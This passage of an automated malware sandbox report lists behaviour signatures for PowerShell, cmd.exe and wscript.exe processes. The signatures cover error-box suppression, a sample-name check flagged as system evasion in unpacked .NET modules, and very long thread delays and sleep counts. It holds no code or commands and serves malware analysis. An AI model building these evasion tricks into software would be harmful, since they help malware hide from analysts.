Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: 15.2.powershell.exe.6fdd700.3.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 15.2.powershell.exe.8d20000.4.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 15.2.powershell.exe.6f3d6e0.1.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 15.2.powershell.exe.6a444d8.2.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 21.2.powershell.exe.689cfe8.1.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 21.2.powershell.exe.63a3de0.0.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 26.2.powershell.exe.69bc9a0.2.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 26.2.powershell.exe.6a5c9c0.1.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 26.2.powershell.exe.64c3798.0.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 31.2.powershell.exe.62d7dd8.1.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 31.2.powershell.exe.57913c0.2.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 31.2.powershell.exe.6377df8.0.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 39.2.powershell.exe.6918850.0.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 39.2.powershell.exe.5dd1e38.1.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 39.2.powershell.exe.69b8870.3.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 44.2.powershell.exe.66667c0.0.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 44.2.powershell.exe.5b1fda8.3.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 44.2.powershell.exe.67067e0.1.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 49.2.powershell.exe.64e6ed8.1.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check
Source: 49.2.powershell.exe.59004a0.2.raw.unpack, mdzzx.cs	.Net Code: Main contains sample name check

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3697			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6084			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: foregroundWindowGot 1603			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2836			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1952			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3422
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 517
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2889
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1087
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2245
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1145
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2058
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1139
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1502

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8400	Thread sleep count: 3697 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8412	Thread sleep count: 6084 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8464	Thread sleep time: -23058430092136925s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8888	Thread sleep count: 2836 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8884	Thread sleep count: 1952 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8932	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8888	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1496	Thread sleep count: 3422 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3308	Thread sleep count: 517 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1568	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4868	Thread sleep count: 2889 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4868	Thread sleep count: 1087 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3680	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2712	Thread sleep count: 2245 > 30
